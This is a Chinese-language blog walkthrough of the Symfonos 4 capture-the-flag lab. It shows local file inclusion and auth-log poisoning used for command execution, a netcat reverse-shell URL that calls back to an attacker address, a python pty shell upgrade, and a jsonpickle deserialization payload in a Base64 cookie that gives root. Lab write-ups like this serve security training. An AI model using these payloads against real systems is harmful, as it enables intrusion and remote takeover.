https://www.vulnhub.com/entry/symfonos-4,347/
目标
-得到root
*如果要下载来玩建议不要看, 因为剧透了
1. 打开你的Kali和靶机(symfonos4)
2. 使用netdiscover扫描靶机.
3. 使用Zenmap扫描靶机看有什么服务端口.
4. 因为有开放端口80 http Apache服务所以一定有网站. 礼貌看看.
5. 我使用dirb跑了一下没发现网址,那么我们就用dirbuster来跑一下.
6. 有两个网页被扫出来/sea.php和/atlantis.php.
7. 先看看http://192.168.1.136/atlantis.php是一个登入界面.
8. 使用命令‘or ‘1’=’1’看下有没有 SQL inject漏洞.
9. 发现没有SQL inject漏洞.
10. 再看看http://192.168.1.136/sea.php.
11. 随便选择一个发现它是php?file=hades那么应该可以Php inject.
13. 那么试一试SSH登入看看, 并不需要真的登入.
14. 然后查看一下有没有我们刚刚的登入记录.
http://192.168.1.136/sea.php?file=../../../../../../var/log/auth&c=id
15. 确定可以使用php inject后, 打开netcat监听.
16. 使用php inject指令来反弹Shell
192.168.1.136/sea.php?file=../../../../../../var/log/auth&c=nc%20192.168.1.230%206666%20-e%20/bin/bash
17. 得到Shell.
18. 然后交换Shell
python -c 'import pty; pty.spawn("/bin/bash")'
19. 进行了普通的检测发现没有什么能用的而且这个用户没有root权限,使用命令#ss -l看看有什么服务运行着.
20. 发现还有一个网页而且是侦听着localhost上的.
21. 那么用socat把它转去其它端口这里我把它转去8888端口.
22. 然后在浏览器输入192.168.1.136:8888就可以了, 他会自动导到whoami网页.
那么我看到有Cookie应该是要用BurpSuite来抓资料看看了,但还是点Main page看看.
23. 嗯,是没有的.
那么打开Burp Suite,然后回去192.168.1.136:8888/whoami
24. 果然我们看到有一个经过加密的username.
25. 使用Burp Suite的 Decoder 来解发现是Base64格式加密.
26. 上网查看了一下发现这个语言叫sonpickle Exploitation, 可以修改一下来运行Netcat命令反弹Shell.
那么上面是明文我们的code然后Encode去Base64.
{"py/object":"__main__.Shell","py/reduce":[{"py/function":"os.system"},["/usr/bin/nc -e /bin/sh 192.168.1.230 6666"], 0, 0, 0]}
https://versprite.com/blog/application-security/into-the-jar-jsonpickle-exploitation/
27. Kali打开监听.
28. 复制我们的Base64命令去username=后面, 然后Forward.
30. 使用#id查看一下, 得到root.
31. 那么直接打开root下的文件, 完成.
感谢阅读
No comments:
Post a Comment